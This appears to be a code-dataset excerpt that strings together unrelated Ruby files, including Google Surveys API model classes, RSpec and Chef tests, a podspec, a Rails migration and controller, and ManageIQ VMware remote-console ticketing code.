@max_cost_per_response_nanos = args[:max_cost_per_response_nanos] if args.key?(:max_cost_per_response_nanos)
@nanos = args[:nanos] if args.key?(:nanos)
end
end
# Message defining the question specifications.
class SurveyQuestion
include Google::Apis::Core::Hashable
# The randomization option for multiple choice and multi-select questions. If
# not specified, this option defaults to randomize.
# Corresponds to the JSON property `answerOrder`
# @return [String]
attr_accessor :answer_order
# Required list of answer options for a question.
# Corresponds to the JSON property `answers`
# @return [Array<String>]
attr_accessor :answers
# Option to allow open-ended text box for Single Answer and Multiple Answer
# question types. This can be used with SINGLE_ANSWER, SINGLE_ANSWER_WITH_IMAGE,
# MULTIPLE_ANSWERS, and MULTIPLE_ANSWERS_WITH_IMAGE question types.
# Corresponds to the JSON property `hasOther`
# @return [Boolean]
attr_accessor :has_other
alias_method :has_other?, :has_other
# For rating questions, the text for the higher end of the scale, such as 'Best'.
# For numeric questions, a string representing a floating-point that is the
# maximum allowed number for a response.
# Corresponds to the JSON property `highValueLabel`
# @return [String]
attr_accessor :high_value_label
#
# Corresponds to the JSON property `images`
# @return [Array<Google::Apis::SurveysV2::SurveyQuestionImage>]
attr_accessor :images
# Currently only support pinning an answer option to the last position.
# Corresponds to the JSON property `lastAnswerPositionPinned`
# @return [Boolean]
attr_accessor :last_answer_position_pinned
alias_method :last_answer_position_pinned?, :last_answer_position_pinned
# For rating questions, the text for the lower end of the scale, such as 'Worst'.
# For numeric questions, a string representing a floating-point that is the
# minimum allowed number for a response.
# Corresponds to the JSON property `lowValueLabel`
# @return [String]
attr_accessor :low_value_label
# Option to force the user to pick one of the open text suggestions. This
# requires that suggestions are provided for this question.
# Corresponds to the JSON property `mustPickSuggestion`
# @return [Boolean]
attr_accessor :must_pick_suggestion
alias_method :must_pick_suggestion?, :must_pick_suggestion
# Number of stars to use for ratings questions.
# Corresponds to the JSON property `numStars`
# @return [String]
attr_accessor :num_stars
# Placeholder text for an open text question.
# Corresponds to the JSON property `openTextPlaceholder`
# @return [String]
attr_accessor :open_text_placeholder
# A list of suggested answers for open text question auto-complete. This is only
# valid if single_line_response is true.
# Corresponds to the JSON property `openTextSuggestions`
# @return [Array<String>]
attr_accessor :open_text_suggestions
# Required question text shown to the respondent.
# Corresponds to the JSON property `question`
# @return [String]
attr_accessor :question
# Used by the Rating Scale with Text question type. This text goes along with
# the question field that is presented to the respondent, and is the actual text
# that the respondent is asked to rate.
# Corresponds to the JSON property `sentimentText`
# @return [String]
attr_accessor :sentiment_text
# Option to allow multiple line open text responses instead of a single line
# response. Note that we don't show auto-complete suggestions with multiple line
# responses.
# Corresponds to the JSON property `singleLineResponse`
# @return [Boolean]
attr_accessor :single_line_response
alias_method :single_line_response?, :single_line_response
# The threshold/screener answer options, which will screen a user into the rest
# of the survey. These will be a subset of the answer option strings.
# Corresponds to the JSON property `thresholdAnswers`
# @return [Array<String>]
attr_accessor :threshold_answers
# Required field defining the question type. For details about configuring
# different type of questions, consult the question configuration guide.
# Corresponds to the JSON property `type`
# @return [String]
attr_accessor :type
# Optional unit of measurement for display (for example: hours, people, miles).
# Corresponds to the JSON property `unitOfMeasurementLabel`
# @return [String]
attr_accessor :unit_of_measurement_label
# The YouTube video ID to be show in video questions.
# Corresponds to the JSON property `videoId`
# @return [String]
attr_accessor :video_id
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@answer_order = args[:answer_order] if args.key?(:answer_order)
@answers = args[:answers] if args.key?(:answers)
@has_other = args[:has_other] if args.key?(:has_other)
@high_value_label = args[:high_value_label] if args.key?(:high_value_label)
@images = args[:images] if args.key?(:images)
@last_answer_position_pinned = args[:last_answer_position_pinned] if args.key?(:last_answer_position_pinned)
@low_value_label = args[:low_value_label] if args.key?(:low_value_label)
@must_pick_suggestion = args[:must_pick_suggestion] if args.key?(:must_pick_suggestion)
@num_stars = args[:num_stars] if args.key?(:num_stars)
@open_text_placeholder = args[:open_text_placeholder] if args.key?(:open_text_placeholder)
@open_text_suggestions = args[:open_text_suggestions] if args.key?(:open_text_suggestions)
@question = args[:question] if args.key?(:question)
@sentiment_text = args[:sentiment_text] if args.key?(:sentiment_text)
@single_line_response = args[:single_line_response] if args.key?(:single_line_response)
@threshold_answers = args[:threshold_answers] if args.key?(:threshold_answers)
@type = args[:type] if args.key?(:type)
@unit_of_measurement_label = args[:unit_of_measurement_label] if args.key?(:unit_of_measurement_label)
@video_id = args[:video_id] if args.key?(:video_id)
end
end
# Container object for image data and alt_text.
class SurveyQuestionImage
include Google::Apis::Core::Hashable
# The alt text property used in image tags is required for all images.
# Corresponds to the JSON property `altText`
# @return [String]
attr_accessor :alt_text
# Inline jpeg, gif, tiff, bmp, or png image raw bytes for an image question
# types.
# Corresponds to the JSON property `data`
# NOTE: Values are automatically base64 encoded/decoded in the client library.
# @return [String]
attr_accessor :data
# The read-only URL for the hosted images.
# Corresponds to the JSON property `url`
# @return [String]
attr_accessor :url
def initialize(**args)
update!(**args)
end
# Update properties of this object
def update!(**args)
@alt_text = args[:alt_text] if args.key?(:alt_text)
@data = args[:data] if args.key?(:data)
@url = args[:url] if args.key?(:url)
end
end
# Message representing why the survey was rejected from review, if it was.
class SurveyRejection
  include Google::Apis::Core::Hashable

  # A human-readable explanation of what was wrong with the survey.
  # Corresponds to the JSON property `explanation`
  # @return [String]
  attr_accessor :explanation

  # Which category of rejection this was. See the Google Surveys Help Center
  # for additional details on each category.
  # Corresponds to the JSON property `type`
  # @return [String]
  attr_accessor :type

  def initialize(**args)
    update!(**args)
  end

  # Copies each attribute present in +args+ onto this object; attributes
  # absent from +args+ keep their current value.
  def update!(**args)
    %i[explanation type].each do |attr|
      instance_variable_set(:"@#{attr}", args[attr]) if args.key?(attr)
    end
  end
end
# Reference to the current results for a given survey.
class SurveyResults
  include Google::Apis::Core::Hashable

  # Human readable string describing the status of the request.
  # Corresponds to the JSON property `status`
  # @return [String]
  attr_accessor :status

  # External survey ID as viewable by survey owners in the editor view.
  # Corresponds to the JSON property `surveyUrlId`
  # @return [String]
  attr_accessor :survey_url_id

  def initialize(**args)
    update!(**args)
  end

  # Copies each attribute present in +args+ onto this object; attributes
  # absent from +args+ keep their current value.
  def update!(**args)
    %i[status survey_url_id].each do |attr|
      instance_variable_set(:"@#{attr}", args[attr]) if args.key?(attr)
    end
  end
end
#
class SurveysDeleteResponse
  include Google::Apis::Core::Hashable

  # Unique request ID used for logging and debugging. Please include in any
  # error reporting or troubleshooting requests.
  # Corresponds to the JSON property `requestId`
  # @return [String]
  attr_accessor :request_id

  def initialize(**args)
    update!(**args)
  end

  # Copies each attribute present in +args+ onto this object; attributes
  # absent from +args+ keep their current value.
  def update!(**args)
    %i[request_id].each do |attr|
      instance_variable_set(:"@#{attr}", args[attr]) if args.key?(attr)
    end
  end
end
#
class SurveysListResponse
  include Google::Apis::Core::Hashable

  #
  # Corresponds to the JSON property `pageInfo`
  # @return [Google::Apis::SurveysV2::PageInfo]
  attr_accessor :page_info

  # Unique request ID used for logging and debugging. Please include in any
  # error reporting or troubleshooting requests.
  # Corresponds to the JSON property `requestId`
  # @return [String]
  attr_accessor :request_id

  # An individual survey resource.
  # Corresponds to the JSON property `resources`
  # @return [Array<Google::Apis::SurveysV2::Survey>]
  attr_accessor :resources

  #
  # Corresponds to the JSON property `tokenPagination`
  # @return [Google::Apis::SurveysV2::TokenPagination]
  attr_accessor :token_pagination

  def initialize(**args)
    update!(**args)
  end

  # Copies each attribute present in +args+ onto this object; attributes
  # absent from +args+ keep their current value.
  def update!(**args)
    %i[page_info request_id resources token_pagination].each do |attr|
      instance_variable_set(:"@#{attr}", args[attr]) if args.key?(attr)
    end
  end
end
#
class SurveysStartRequest
  include Google::Apis::Core::Hashable

  # *Deprecated* Threshold to start a survey automatically if the quoted price
  # is less than or equal to this value. See Survey.Cost for more details.
  # This will no longer be available after June 2018.
  # Corresponds to the JSON property `maxCostPerResponseNanos`
  # @return [Fixnum]
  attr_accessor :max_cost_per_response_nanos

  def initialize(**args)
    update!(**args)
  end

  # Copies each attribute present in +args+ onto this object; attributes
  # absent from +args+ keep their current value.
  def update!(**args)
    %i[max_cost_per_response_nanos].each do |attr|
      instance_variable_set(:"@#{attr}", args[attr]) if args.key?(attr)
    end
  end
end
#
class SurveysStartResponse
  include Google::Apis::Core::Hashable

  # Unique request ID used for logging and debugging. Please include in any
  # error reporting or troubleshooting requests.
  # Corresponds to the JSON property `requestId`
  # @return [String]
  attr_accessor :request_id

  def initialize(**args)
    update!(**args)
  end

  # Copies each attribute present in +args+ onto this object; attributes
  # absent from +args+ keep their current value.
  def update!(**args)
    %i[request_id].each do |attr|
      instance_variable_set(:"@#{attr}", args[attr]) if args.key?(attr)
    end
  end
end
#
class SurveysStopResponse
  include Google::Apis::Core::Hashable

  # Unique request ID used for logging and debugging. Please include in any
  # error reporting or troubleshooting requests.
  # Corresponds to the JSON property `requestId`
  # @return [String]
  attr_accessor :request_id

  def initialize(**args)
    update!(**args)
  end

  # Copies each attribute present in +args+ onto this object; attributes
  # absent from +args+ keep their current value.
  def update!(**args)
    %i[request_id].each do |attr|
      instance_variable_set(:"@#{attr}", args[attr]) if args.key?(attr)
    end
  end
end
#
class TokenPagination
  include Google::Apis::Core::Hashable

  #
  # Corresponds to the JSON property `nextPageToken`
  # @return [String]
  attr_accessor :next_page_token

  #
  # Corresponds to the JSON property `previousPageToken`
  # @return [String]
  attr_accessor :previous_page_token

  def initialize(**args)
    update!(**args)
  end

  # Copies each attribute present in +args+ onto this object; attributes
  # absent from +args+ keep their current value.
  def update!(**args)
    %i[next_page_token previous_page_token].each do |attr|
      instance_variable_set(:"@#{attr}", args[attr]) if args.key?(attr)
    end
  end
end
end
end
end
| 39.171965 | 118 | 0.625484 |
e203d6be0c3d3ac4ae8fa9ba0125e3a519ebc51a | 3,782 | require 'spec_helper'
# Unit specs for Vaderc::Configuration: default attribute values, explicit
# constructor arguments, ENV-variable overrides, and loading from a YAML
# config file.
describe Vaderc::Configuration do
  context '#initialize' do
    describe 'attributes' do
      let(:configuration) { Vaderc::Configuration.new }
      it 'has a default port' do
        expect(configuration.port).to eq('6667')
      end
      it 'has a default mode' do
        expect(configuration.mode).to eq('8')
      end
      it 'has a default server' do
        expect(configuration.server).to eq('localhost')
      end
      it 'has a default nickname' do
        expect(configuration.nickname).to match(/vaderc\d+/)
      end
      it 'has a default realname' do
        expect(configuration.realname).to match(/Vaderc User/)
      end
      it 'can receive custom attributes' do
        config = Vaderc::Configuration.new(
          port: '1138',
          mode: '1999',
          server: 'localhost',
          nickname: 'dummy',
          realname: 'big dummy'
        )
        expect(config.port).to eq('1138')
        expect(config.mode).to eq('1999')
        expect(config.server).to eq('localhost')
        expect(config.nickname).to eq('dummy')
        expect(config.realname).to eq('big dummy')
      end
      it 'can override defaults with env vars' do
        # stub_const replaces the *entire* ENV hash for this example, so any
        # variable not listed here is unset from the code's point of view.
        stub_const(
          'ENV',
          'VADERC_PORT'     => '1138',
          'VADERC_MODE'     => '1999',
          'VADERC_SERVER'   => 'localhost',
          'VADERC_NICKNAME' => 'tommy',
          'VADERC_REALNAME' => 'tommy cool'
        )
        expect(configuration.port).to eq('1138')
        expect(configuration.mode).to eq('1999')
        expect(configuration.server).to eq('localhost')
        expect(configuration.nickname).to eq('tommy')
        expect(configuration.realname).to eq('tommy cool')
      end
    end
    context 'config_filename' do
      let(:configuration) do
        Vaderc::Configuration.new(config_filename: 'config.yml')
      end
      it 'has a default config_filename' do
        stub_const('ENV', 'HOME' => '/home/user')
        configuration = Vaderc::Configuration.new
        expect(configuration.config_filename)
          .to eq('/home/user/.vaderc/config.yml')
      end
      # NOTE: 'specifiy' typo is part of the example name only; harmless.
      it 'can specifiy config_filename' do
        expect(configuration.config_filename).to eq('config.yml')
      end
      describe 'config_filename exists' do
        before do
          allow(File).to receive('exist?').with('config.yml') { true }
          allow(File).to receive('read').with('config.yml') { content }
        end
        # YAML fixture served as the fake file contents. The heredoc uses a
        # single-quoted terminator consisting of a lone dot ('.'), which also
        # disables interpolation inside the body.
        let(:content) do
          <<-'.'
            :server: localhost
            :mode: 8
            :port: 6668
            :nickname: testUser
            :realname: Real User
          .
        end
        it 'uses file if config_filename exists' do
          expect(configuration.mode).to eq(8)
          expect(configuration.port).to eq(6668)
          expect(configuration.server).to eq('localhost')
          expect(configuration.nickname).to eq('testUser')
          expect(configuration.realname).to eq('Real User')
        end
        describe '#load_local_config' do
          it 'returns a hash' do
            expected = {
              server: 'localhost',
              mode: 8,
              port: 6668,
              nickname: 'testUser',
              realname: 'Real User'
            }
            hash = configuration.load_local_config('config.yml')
            expect(hash).to be_kind_of(Hash)
            expect(hash).to eq(expected)
          end
          it 'returns empty hash if config_file is invalid yaml' do
            allow(File).to receive('read').with('config.yml') { 'bad_content' }
            expect(configuration.load_local_config('config.yml')).to eq({})
          end
        end
      end
    end
  end
end
| 29.546875 | 79 | 0.558699 |
ac4b43c3e29877f254c3734109593a2931b47ce4 | 1,548 | #
# Be sure to run `pod lib lint Lib1.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
# Podspec for Lib1. Validate with `pod lib lint Lib1.podspec` before pushing.
Pod::Spec.new do |s|
  s.name    = "Lib1"
  s.version = "0.0.1"
  s.summary = "some thing must be done"

  # Long-form description shown on the CocoaPods index page.
  s.description = <<-DESC
TODO: Add long description of the pod here.
                       DESC

  s.homepage = "https://github.com/seabird2020/Lib1"
  s.license  = { :type => "MIT", :file => "LICENSE" }
  s.author   = { "seabird2020" => "[email protected]" }
  s.source   = { :git => "https://github.com/seabird2020/Lib1.git", :tag => s.version.to_s }

  s.ios.deployment_target = "8.0"

  s.source_files = "Lib1/Classes/**/*"
end
| 36 | 100 | 0.627261 |
1a436cb43af44af200ce2699b1f9f8895b3939cc | 418 | module RemoteService
class Base
  class << self
    # Fully-qualified queue name for this service class, e.g. "services.base".
    # The bare name is memoized in @queue the first time it is computed.
    def queue_name
      @queue ||= default_queue_name
      "services.#{@queue}"
    end

    private

    # DSL hook allowing a subclass to override the derived queue name.
    def queue(name)
      @queue = name
    end

    # Derives a snake_case queue name from the demodulized class name,
    # e.g. RemoteService::FooBar -> "foo_bar".
    def default_queue_name
      base = self.name.split(/::/).last
      base.gsub(/([A-Z]+)([A-Z][a-z])/, '\1_\2')
          .gsub(/([a-z\d])([A-Z])/, '\1_\2')
          .tr("-", "_")
          .downcase
    end
  end
end
end
| 17.416667 | 51 | 0.480861 |
bb0f7c07954ff0450dd52ac53134e765f6671b7b | 390 | class CreateOrderedWorkPackages < ActiveRecord::Migration[5.1]
# Creates the ordered_work_packages join table that persists a manual sort
# order of work packages within a query.
def change
  create_table :ordered_work_packages do |t|
    # Manual sort position; indexed for ordered reads.
    t.integer :position, index: true, null: false
    # Rows are removed automatically when the referenced query or work
    # package is deleted (ON DELETE CASCADE on the foreign keys).
    t.references :query, type: :integer, foreign_key: { index: true, on_delete: :cascade }
    t.references :work_package, type: :integer, foreign_key: { index: true, on_delete: :cascade }
  end
end
end
| 35.454545 | 99 | 0.702564 |
61d7065c4330dca68279f21aca82c76d6d8ac73b | 433 | class Typewriter::ImageUploadsController < ApplicationController
# NOTE(review): CSRF protection is skipped for these API-style endpoints —
# confirm this is intentional for all callers.
skip_before_action :verify_authenticity_token

# Persists an uploaded image and renders the created record as JSON.
def create
  image_upload = Typewriter::ImageUpload.create!(image_params)
  render json: image_upload.to_json
end

# Renders the src/srcset URLs for a previously-uploaded image.
def show
  image_upload = Typewriter::ImageUpload.find(params[:id])
  render json: {
    src: image_upload.image_src,
    srcset: image_upload.image_srcset
  }
end

private

# Strong-parameters whitelist: only the :image attribute is accepted.
def image_params
  params.permit(:image)
end
end
| 18.826087 | 70 | 0.727483 |
4ab5b746dab4c2706925b0cbb405d95dacab6f81 | 1,445 | require "helper/acceptance"
# Acceptance test: enabling the Flowdock notifier on a project and verifying
# the team-inbox API is hit for both successful and failed builds.
class FlowdockNotificationTest < Test::Unit::AcceptanceTestCase
  story <<-EOS
    As an administrator,
    I want to setup the Flowdock notifiers on my projects
    So that I get alerts with every build
  EOS

  setup do
    load "integrity/notifier/flowdock.rb"
    @token = "fc7795d580b6adacaa90f1ds24030s14a31a6522sed"
    @repo = git_repo(:my_test_project)
    Project.gen(:my_test_project, :uri => @repo.uri)
    @api_url = "https://api.flowdock.com/v1/messages/team_inbox/#{@token}"
  end

  teardown do
    WebMock.reset!
    Notifier.available.replace({})
  end

  # Adds a passing or failing commit to the fixture repository and returns
  # its abbreviated SHA.
  def commit(successful)
    successful ? @repo.add_successful_commit : @repo.add_failing_commit
    @repo.short_head
  end

  # Stubs the Flowdock team-inbox endpoint to accept any post with an empty
  # JSON body (shared by both scenarios below).
  def stub_flowdock_api
    stub_request(:post, @api_url).to_return(
      :status => 200,
      :body   => {}.to_json)
  end

  # Enables the Flowdock notifier through the UI and triggers a manual build.
  def build
    login_as "admin", "test"

    visit "/my-test-project"
    click_link "Edit"
    check "enabled_notifiers_flowdock"
    fill_in "API Token", :with => @token
    check "Notify on success?"
    click_button "Update"
    click_button "Manual Build"
  end

  scenario "Notifying a successful build" do
    commit(true)
    stub_flowdock_api
    build
    assert_requested :post, @api_url
  end

  scenario "Notifying a failed build" do
    commit(false)
    stub_flowdock_api
    build
    assert_requested :post, @api_url
  end
end
| 22.230769 | 74 | 0.672664 |
acca54cd52fbd4b51a6b123153381777d3fd5f1a | 3,553 | class Name < AbstractModel
# Is it safe to merge this Name with another?  If any information will get
# lost we return false.  In practice only if it has Namings.
# Returns true when no Naming references this Name.
def mergeable?
  namings.empty?
end
# Merge all the stuff that refers to +old_name+ into +self+.  Usually, no
# changes are made to +self+, however it might update the +classification+
# cache if the old name had a better one -- NOT SAVED!!  Then +old_name+ is
# destroyed; all the things that referred to +old_name+ are updated and
# saved.
#
# Side effects (each dependent record is saved individually):
# observations, namings, misspellings, interests, notifications and
# descriptions are re-pointed at +self+; the old rss_log is orphaned;
# old versions are destroyed and editor contributions decremented.
def merge(old_name)
  return if old_name == self
  # NOTE(review): this initial assignment is dead — xargs is only ever
  # reassigned (and never read) in the descriptions loop below.
  xargs = {}
  # Move all observations over to the new name.
  old_name.observations.each do |obs|
    obs.name = self
    obs.save
  end
  # Move all namings over to the new name.
  # (block variable is a Naming despite being called +name+)
  old_name.namings.each do |name|
    name.name = self
    name.save
  end
  # Move all misspellings over to the new name.
  # A Name cannot be marked as a misspelling of itself, so clear the link
  # in that case.
  old_name.misspellings.each do |name|
    if name == self
      name.correct_spelling = nil
    else
      name.correct_spelling = self
    end
    name.save
  end
  # Move over any interest in the old name.
  Interest.where(target_type: "Name", target_id: old_name.id).each do |int|
    int.target = self
    int.save
  end
  # Move over any notifications on the old name.
  Notification.where(flavor: Notification.flavors[:name],
                     obj_id: old_name.id).each do |note|
    note.obj_id = id
    note.save
  end
  # # Merge the two "main" descriptions if it can.
  # if self.description and old_name.description and
  #    (self.description.source_type == :public) and
  #    (old_name.description.source_type == :public)
  #   self.description.merge(old_name.description, true)
  # end
  # If this one doesn't have a primary description and the other does,
  # then make it this one's.
  if !description && old_name.description
    self.description = old_name.description
  end
  # Update the classification cache if that changed in the process.
  # (Not saved here; see the method comment above.)
  if description &&
     (classification != description.classification)
    self.classification = description.classification
  end
  # Move over any remaining descriptions.
  old_name.descriptions.each do |desc|
    # NOTE(review): xargs is built but never used — looks like a leftover
    # from a removed logging/transaction API call.
    xargs = {
      id: desc,
      set_name: self
    }
    desc.name_id = id
    desc.save
  end
  # Log the action.
  if old_name.rss_log
    old_name.rss_log.orphan(old_name.display_name, :log_name_merged,
                            this: old_name.display_name, that: display_name)
  end
  # Destroy past versions, remembering who edited them.
  editors = []
  old_name.versions.each do |ver|
    editors << ver.user_id
    ver.destroy
  end
  # Update contributions for editors (the old name's own author excluded).
  editors.delete(old_name.user_id)
  editors.uniq.each do |user_id|
    SiteData.update_contribution(:del, :names_versions, user_id)
  end
  # Fill in citation if new name is missing one.
  if citation.blank? && old_name.citation.present?
    self.citation = old_name.citation.strip_squeeze
  end
  # Save any notes the old name had.  This is the only branch in which
  # +self+ is logged and saved by this method.
  if old_name.has_notes? && (old_name.notes != notes)
    if has_notes?
      self.notes += "\n\nThese notes come from #{old_name.format_name} when it was merged with this name:\n\n" +
                    old_name.notes
    else
      self.notes = old_name.notes
    end
    log(:log_name_updated, touch: true)
    save
  end
  # Finally destroy the name.
  old_name.destroy
end
end
| 29.363636 | 114 | 0.642274 |
edbe428a28242892aecaa774be8b53e20ca854d3 | 1,306 | require 'test_helper'
# Specs for the Lotus::Validations attribute DSL.
describe Lotus::Validations do
  describe '.attribute' do
    it 'coerces attribute names to symbols' do
      assert AttributeTest.defined_validation?(:attr)
    end

    it 'ensures attribute uniqueness' do
      assert UniquenessAttributeTest.defined_validation?(:attr)
    end

    it 'collects multiple errors for a single attribute' do
      form = MultipleValidationsTest.new(email: 'test', email_confirmation: 'x')
      form.valid?.must_equal false

      expected = [
        Lotus::Validations::Error.new(:email, :format, /@/, 'test'),
        Lotus::Validations::Error.new(:email, :confirmation, true, 'test')
      ]
      form.errors.for(:email).must_equal expected
    end

    describe 'name checks' do
      it 'checks validation names' do
        error = -> {
          Class.new {
            include Lotus::Validations
            attribute :email, pesence: true, comfirmation: true
          }
        }.must_raise ArgumentError

        error.message.must_equal 'Unknown validation(s): pesence, comfirmation for "email" attribute'
      end
    end
  end

  describe '.defined_attributes' do
    it 'returns a set of unique attribute names' do
      UniquenessAttributeTest.defined_attributes.must_equal(Set.new(%w(attr)))
    end
  end
end
| 29.022222 | 105 | 0.667688 |
87b3f2c21a1699c67494819729d48c59a1d8a37b | 575 | #
# Append to empty file
#
# Fixture user and pre-existing (empty) target file for the cases below.
user 'test_user'
file '/tmp/emptyfile'

# Case 1: the line should be appended to an existing-but-empty file.
append_if_no_line 'should add to empty file' do
  path '/tmp/emptyfile'
  line 'added line'
end

# Case 2: the target file does not exist — the resource should create it.
append_if_no_line 'missing_file' do
  path '/tmp/missing_create'
  line 'added line'
end

# Case 3: a newly-created file should carry the requested owner/group/mode.
append_if_no_line 'missing_file with owner, group, mode' do
  path '/tmp/missing_create_owner'
  line 'Owned by test_user'
  owner 'test_user'
  group 'test_user'
  mode '0600'
end

# Case 4: with ignore_missing disabled the resource fails on a missing file;
# ignore_failure lets the Chef run continue so the failure can be asserted.
append_if_no_line 'missing_file fail' do
  path '/tmp/missing_fail'
  line 'added line'
  ignore_missing false
  ignore_failure true
end
| 17.424242 | 59 | 0.742609 |
1db10da957590a8298d2df61ab73a68b3da64ed8 | 1,345 | # -*- encoding: utf-8 -*-
# stub: dotenv 2.5.0 ruby lib
# Auto-generated RubyGems stub specification for dotenv 2.5.0 (see the
# "# stub:" header above).  Hand edits are normally lost on regeneration.
Gem::Specification.new do |s|
  s.name = "dotenv"
  s.version = "2.5.0"

  s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
  s.require_paths = ["lib"]
  s.authors = ["Brandon Keepers"]
  s.date = "2018-06-21"
  s.description = "Loads environment variables from `.env`."
  s.email = ["[email protected]"]
  s.executables = ["dotenv"]
  s.files = ["bin/dotenv"]
  s.homepage = "https://github.com/bkeepers/dotenv"
  s.licenses = ["MIT"]
  s.rubygems_version = "2.4.8"
  s.summary = "Loads environment variables from `.env`."

  s.installed_by_version = "2.4.8" if s.respond_to? :installed_by_version

  # Development dependencies, declared three ways for compatibility with
  # progressively older RubyGems APIs; every branch registers the same gems.
  if s.respond_to? :specification_version then
    s.specification_version = 4

    if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
      s.add_development_dependency(%q<rake>, [">= 0"])
      s.add_development_dependency(%q<rspec>, [">= 0"])
      s.add_development_dependency(%q<rubocop>, ["~> 0.40.0"])
    else
      s.add_dependency(%q<rake>, [">= 0"])
      s.add_dependency(%q<rspec>, [">= 0"])
      s.add_dependency(%q<rubocop>, ["~> 0.40.0"])
    end
  else
    s.add_dependency(%q<rake>, [">= 0"])
    s.add_dependency(%q<rspec>, [">= 0"])
    s.add_dependency(%q<rubocop>, ["~> 0.40.0"])
  end
end
| 32.804878 | 105 | 0.628996 |
28316c8757c0f65278b041f958677a724d5575f0 | 5,469 | module ManageIQ::Providers::Vmware::InfraManager::Vm::RemoteConsole
require_dependency 'securerandom'

# True when +type+ names a console protocol this mixin can serve
# (case-insensitive).
def console_supported?(type)
  %w(VMRC VNC WEBMKS).include?(type.upcase)
end

# Raises MiqException::RemoteConsoleNotSupportedError unless a console
# ticket can be issued: the VM must be managed by an EMS, VMRC additionally
# needs console credentials, and (unless options[:check_if_running] is
# explicitly false) the VM must be powered on.
def validate_remote_console_acquire_ticket(protocol, options = {})
  raise(MiqException::RemoteConsoleNotSupportedError, "#{protocol} remote console requires the vm to be registered with a management system.") if ext_management_system.nil?

  raise(MiqException::RemoteConsoleNotSupportedError, "remote console requires console credentials") if ext_management_system.authentication_type(:console).nil? && protocol == "vmrc"

  options[:check_if_running] = true unless options.key?(:check_if_running)
  raise(MiqException::RemoteConsoleNotSupportedError, "#{protocol} remote console requires the vm to be running.") if options[:check_if_running] && state != "on"
end

# Dispatches to the protocol-specific *_acquire_ticket method below.
def remote_console_acquire_ticket(userid, originating_server, protocol)
  send("remote_console_#{protocol.to_s.downcase}_acquire_ticket", userid, originating_server)
end

# Queues remote_console_acquire_ticket on the ems_operations role and
# returns the backing MiqTask.
def remote_console_acquire_ticket_queue(protocol, userid)
  task_opts = {
    :action => "acquiring Vm #{name} #{protocol.to_s.upcase} remote console ticket for user #{userid}",
    :userid => userid
  }

  queue_opts = {
    :class_name  => self.class.name,
    :instance_id => id,
    :method_name => 'remote_console_acquire_ticket',
    :priority    => MiqQueue::HIGH_PRIORITY,
    :role        => 'ems_operations',
    :zone        => my_zone,
    :args        => [userid, MiqServer.my_server.id, protocol]
  }

  MiqTask.generic_action_with_callback(task_opts, queue_opts)
end

#
# VMRC
#

# Obtains a VMRC ticket from the EMS and returns a hash with the ticket and
# a ready-to-use vmrc:// URL. The user/server arguments are unused (kept
# for interface parity with the other protocols).
def remote_console_vmrc_acquire_ticket(_userid = nil, _originating_server = nil)
  validate_remote_console_acquire_ticket("vmrc")
  ticket = ext_management_system.remote_console_vmrc_acquire_ticket
  {:ticket => ticket, :remote_url => build_vmrc_url(ticket), :proto => 'remote'}
end

def validate_remote_console_vmrc_support
  validate_remote_console_acquire_ticket("vmrc")
  ext_management_system.validate_remote_console_vmrc_support
  true
end

#
# WebMKS
#

# Obtains a WebMKS ticket from the EMS, invalidates any previous console
# tokens for this VM, then launches (or reuses) a websocket proxy pointed at
# the host/port returned with the ticket.
def remote_console_webmks_acquire_ticket(userid, originating_server = nil)
  validate_remote_console_acquire_ticket("webmks")
  ticket = ext_management_system.vm_remote_console_webmks_acquire_ticket(self)

  SystemConsole.force_vm_invalid_token(id)

  console_args = {
    :user       => User.find_by(:userid => userid),
    :vm_id      => id,
    :ssl        => true,
    :protocol   => 'webmks',
    :secret     => ticket['ticket'],
    :url_secret => SecureRandom.hex,
  }
  SystemConsole.launch_proxy_if_not_local(console_args, originating_server, ticket['host'], ticket['port'].to_i)
end

def validate_remote_console_webmks_support
  validate_remote_console_acquire_ticket("webmks")
  ext_management_system.validate_remote_console_webmks_support
  true
end

#
# HTML5 selects the best available console type (VNC or WebMKS)
#

# Picks VNC when the provider-side RemoteDisplay.vnc.enabled extraConfig
# flag is "true", WebMKS otherwise, and delegates to that protocol.
def remote_console_html5_acquire_ticket(userid, originating_server = nil)
  protocol = with_provider_object { |v| v.extraConfig["RemoteDisplay.vnc.enabled"] == "true" } ? 'vnc' : 'webmks'
  send("remote_console_#{protocol}_acquire_ticket", userid, originating_server)
end

#
# VNC
#

# Enables VNC on the VM with a freshly reserved host port and a random
# 8-character password, disabling VNC on any other VM that previously held
# that port, then launches a websocket proxy for the console.
def remote_console_vnc_acquire_ticket(userid, originating_server)
  validate_remote_console_acquire_ticket("vnc")

  password  = SecureRandom.base64[0, 8] # Random password from the Base64 character set
  host_port = host.reserve_next_available_vnc_port

  # Determine if any Vms on this Host already have this port, and if so, disable them
  old_vms = host.vms_and_templates.where(:vnc_port => host_port)
  old_vms.each do |old_vm|
    _log.info "Disabling VNC on #{old_vm.class.name} id: [#{old_vm.id}] name: [#{old_vm.name}], since the port is being reused."
    old_vm.with_provider_object do |vim_vm|
      vim_vm.setRemoteDisplayVncAttributes(:enabled => false, :port => nil, :password => nil)
    end
  end
  old_vms.update_all(:vnc_port => nil)

  # Enable on this Vm with the requested port and random password
  _log.info "Enabling VNC on #{self.class.name} id: [#{id}] name: [#{name}]"
  with_provider_object do |vim_vm|
    vim_vm.setRemoteDisplayVncAttributes(:enabled => true, :port => host_port, :password => password)
  end
  update(:vnc_port => host_port)

  SystemConsole.force_vm_invalid_token(id)

  console_args = {
    :user       => User.find_by(:userid => userid),
    :vm_id      => id,
    :ssl        => false,
    :protocol   => 'vnc',
    :secret     => password,
    :url_secret => SecureRandom.hex
  }
  host_address = host.hostname

  SystemConsole.launch_proxy_if_not_local(console_args, originating_server, host_address, host_port)
end

private

# Method to generate the remote URI for the VMRC console
def build_vmrc_url(ticket)
  url = URI::Generic.build(:scheme   => "vmrc",
                           :userinfo => "clone:#{ticket}",
                           :host     => ext_management_system.hostname || ext_management_system.ipaddress,
                           :port     => 443,
                           :path     => "/",
                           :query    => "moid=#{ems_ref}").to_s
  # VMRC doesn't like brackets around IPv6 addresses
  url.sub(/(.*)\[/, '\1').sub(/(.*)\]/, '\1')
end
end
| 37.204082 | 184 | 0.685134 |
